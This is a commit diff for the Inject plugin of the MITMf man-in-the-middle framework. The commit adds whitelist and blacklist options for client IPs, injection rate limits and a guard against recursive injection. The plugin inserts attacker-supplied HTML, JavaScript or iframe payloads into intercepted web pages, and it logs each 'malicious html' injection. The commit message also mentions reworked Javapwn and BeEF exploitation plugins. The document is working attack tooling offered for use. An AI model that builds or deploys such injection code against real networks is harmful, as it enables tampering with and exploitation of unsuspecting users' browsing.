- Revamped Javapwn plugin with new detection and exploitation algo

- Added whitelist/blacklist ip options to the inject plugin - Revamped Beefautorun plugin, with new injection algo - Metasploit and BeEF options are now a config file (mitmf.cfg)
2025-07-07 05:22:15 -07:00 · 2014-12-21 17:33:56 +01:00 · 2014-12-21 17:33:56 +01:00 · f359ee7cdd
commit f359ee7cdd
parent 4ae50e6e0c
7 changed files with 211 additions and 121 deletions
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@ -1,4 +1,6 @@
 import logging
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
+from scapy.all import get_if_addr
 import time
 import re
 import argparse
@ -15,15 +17,36 @@ class Inject(CacheKill, Plugin):

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
-        self.options = options
-        self.html_src = options.html_url
-        self.js_src = options.js_url
-        self.rate_limit = options.rate_limit
-        self.count_limit = options.count_limit
-        self.per_domain = options.per_domain
-        self.match_str = options.match_str
+        self.options      = options
+        self.html_src     = options.html_url
+        self.js_src       = options.js_url
+        self.rate_limit   = options.rate_limit
+        self.count_limit  = options.count_limit
+        self.per_domain   = options.per_domain
+        self.black_ips    = options.black_ips
+        self.white_ips    = options.white_ips
+        self.match_str    = options.match_str
        self.html_payload = options.html_payload

+        try:
+            self.proxyip = get_if_addr(options.interface)
+            if self.proxyip == "0.0.0.0":
+                sys.exit("[-] Interface %s does not have an IP address" % options.interface)
+        except Exception, e:
+            sys.exit("[-] Error retrieving interface IP address: %s" % e)
+
+        if self.white_ips:
+            temp = []
+            for ip in self.white_ips.split(','):
+                temp.append(ip)
+            self.white_ips = temp
+
+        if self.black_ips:
+            temp = []
+            for ip in self.black_ips.split(','):
+                temp.append(ip)
+            self.black_ips = temp
+
        if self.options.preserve_cache:
            self.implements.remove("handleHeader")
            self.implements.remove("connectionMade")
@ -43,15 +66,15 @@ class Inject(CacheKill, Plugin):
        #print "http://" + request.client.getRequestHostname() + request.uri
        ip, hn, mime = self._get_req_info(request)
        if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
-
-            data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
-            self.ctable[ip] = time.time()
-            self.dtable[ip+hn] = True
-            self.count += 1
-            logging.info("%s [%s] Injected malicious html" % (request.client.getClientIP(), request.headers['host']))
-            return {'request': request, 'data': data}
-        else:
-            return
+            if hn not in self.proxyip: #prevents recursive injecting
+                data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
+                self.ctable[ip] = time.time()
+                self.dtable[ip+hn] = True
+                self.count += 1
+                logging.info("%s [%s] Injected malicious html" % (ip, hn))
+                return {'request': request, 'data': data}
+            else:
+                return

    def _get_payload(self):
        return self._get_js() + self._get_iframe() + self.html_payload
@ -62,12 +85,28 @@ class Inject(CacheKill, Plugin):
        options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
        options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
        options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
-        options.add_argument("--per-domain", action="store_true", help="Inject once per domain per client.")
-        options.add_argument("--rate-limit", type=float, help="Inject once every RATE_LIMIT seconds per client.")
-        options.add_argument("--count-limit", type=int, help="Inject only COUNT_LIMIT times per client.")
        options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
+        group = options.add_mutually_exclusive_group(required=False)
+        group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
+        group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
+        group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
+        group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
+        group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")

    def _should_inject(self, ip, hn, mime):
+
+        if self.white_ips is not None:
+            if ip in self.white_ips:
+                return True
+            else:
+                return False
+
+        if self.black_ips is not None:
+            if ip in self.black_ips:
+                return False
+            else:
+                return True
+
        if self.count_limit == self.rate_limit is None and not self.per_domain:
            return True

@ -81,6 +120,7 @@ class Inject(CacheKill, Plugin):

        if self.per_domain:
            return not ip+hn in self.dtable
+
        #print mime
        return mime.find(self.mime) != -1